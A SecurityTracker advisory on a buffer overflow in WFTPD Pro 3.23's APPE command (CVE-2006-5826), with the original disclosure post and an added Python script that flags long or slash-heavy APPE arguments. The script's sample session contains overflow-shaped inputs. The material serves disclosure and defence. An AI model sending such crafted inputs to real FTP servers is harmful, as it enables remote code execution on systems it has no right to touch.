SecurityTracker.com

Category:   Application (File Transfer/Sharing)  >   WFTPD Pro
Vendors:   Texas Imperial Software
WFTPD Pro Buffer Overflow in APPE Command Lets Remote Authenticated Users Execute Arbitrary Code
SecurityTracker Alert ID:  1017173
SecurityTracker URL:  http://securitytracker.com/id/1017173
CVE Reference:   CVE-2006-5826
Updated:  Jun 3 2008
Original Entry Date:  Nov 7 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 3.23
Description:   A vulnerability was reported in WFTPD Pro. A remote authenticated user can execute arbitrary code on the target system.

A remote authenticated user can send a specially crafted APPE command parameter containing slashes and/or backslashes to trigger a buffer overflow and execute arbitrary code on the target system. The code will run with the privileges of the target service.

Joxean Koret discovered this vulnerability.

Impact:   A remote authenticated user can execute arbitrary code on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.wftpd.com/
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   None.
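
With no vendor fix listed, one way a defender could screen FTP control-channel traffic for the input shape this alert describes. This is an added example, not part of the original advisory or the vendor's code; the length limit, the separator-density rule and the function names are assumptions, since the alert states no overflow length.

```python
# Added example: screen FTP control-channel lines for suspicious APPE arguments.
MAX_ARG_LEN = 255      # assumed policy limit; the alert states no overflow length
DENSITY_MIN_LEN = 64   # assumed: only judge separator density on longer arguments


def inspect_command(line: bytes):
    """Classify one client command line as pass, alert or drop."""
    verb, _, arg = line.rstrip(b"\r\n").partition(b" ")
    if verb.upper() != b"APPE":
        return ("pass", "not APPE")
    seps = arg.count(b"/") + arg.count(b"\\")
    if len(arg) > MAX_ARG_LEN:
        return ("drop", f"APPE argument is {len(arg)} bytes, {seps} separators")
    # Real paths are mostly name characters; a long argument that is mostly
    # slashes/backslashes matches the input shape described in the alert.
    if len(arg) >= DENSITY_MIN_LEN and seps * 2 > len(arg):
        return ("alert", f"APPE argument is {seps}/{len(arg)} separators")
    return ("pass", "APPE argument within policy")


def scan_session(lines):
    """Return (index, verdict, reason) for every line that is not a pass."""
    findings = []
    for i, line in enumerate(lines):
        verdict, reason = inspect_command(line)
        if verdict != "pass":
            findings.append((i, verdict, reason))
    return findings


# Constructed sample session (not captured traffic).
SAMPLE_SESSION = [
    b"USER alice\r\n",
    b"APPE logs/app.log\r\n",
    b"APPE " + b"\\/" * 40 + b"\r\n",
    b"APPE " + b"/" * 300 + b"\r\n",
]

if __name__ == "__main__":
    for index, verdict, reason in scan_session(SAMPLE_SESSION):
        print(index, verdict, reason)
```

The same check can sit in an FTP-aware proxy in front of the server or run over recorded control-channel logs after the fact.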


 Source Message Contents

Subject:  [Full-disclosure] WFTPD Pro Server 3.23 Buffer Overflow

WFTPD Pro Server 3.23 Buffer Overflow
-------------------------------------

A buffer overflow was found in the APPE command when
passing (as first) a long string
with slashes and/or backslashes. The exploit is
clearly exploitable as overwriting EIP
is quite easy but I'm too lazy...

Attached goes an (unfinished) POC.

Disclaimer
----------

The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
---------------------------------------------------------------------------

Contact
-------
Joxean Koret at <<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es

